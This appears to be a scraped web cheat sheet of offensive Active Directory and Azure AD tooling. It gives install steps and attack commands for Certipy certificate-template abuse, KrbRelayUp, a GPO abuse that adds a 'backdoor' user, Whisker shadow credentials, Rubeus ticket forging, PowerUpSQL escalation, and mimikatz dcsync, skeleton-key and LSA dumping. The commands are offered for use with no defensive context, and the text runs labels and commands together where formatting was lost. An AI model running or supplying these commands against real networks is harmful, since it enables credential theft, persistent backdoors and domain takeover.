Advanced AD attacks — trust abuse, forest pivoting, EDR evasion.
Official PageADCS attack tool (ESC1-ESC8)
pip3 install certipy-adcertipy find -u user@domain -p pass -vulnerable; certipy req -ca CA -template ESC1RBCD local privilege escalation
Compile from sourceKrbRelayUp.exe relay -d domain.local -cn NewComputerGPO abuse for privesc
pip3 install pygpoabusepygpoabuse DOMAIN/admin:pass -gpo-id GUID -powershell "net user backdoor P@ss /add"Shadow Credentials attack tool
Compile from sourceWhisker.exe add /target:targetuserAzure AD attack toolkit (PowerShell)
Install-Module AADInternalsGet-AADIntAccessTokenForAADGraph; Invoke-AADIntReconAsOutsiderFull Kerberos abuse toolkit
Build from sourceRubeus.exe diamond /tgtdeleg; Rubeus.exe s4uMSSQL attack framework
Import-Module PowerUpSQLGet-SQLInstanceDomain | Get-SQLServerInfo; Invoke-SQLEscalatePrivCredential/ticket extraction
Download from githublsadump::dcsync; misc::skeleton; lsadump::lsa /patch